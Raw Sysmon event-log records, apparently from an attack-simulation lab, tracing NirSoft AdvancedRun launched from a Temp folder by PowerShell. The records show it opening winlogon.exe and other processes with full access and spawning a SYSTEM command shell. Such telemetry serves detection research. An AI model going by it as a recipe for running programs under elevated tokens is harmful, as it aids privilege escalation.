18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004009308Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004009307Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.710{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004009306Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.694{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004009305Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:41:37.707{834264DD-FE61-61EA-B605-000000002702}304C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004008732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:46.644{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004008621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.349{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgATTACKRANGE\Administrator 10341000x80000000000000004008620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.347{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 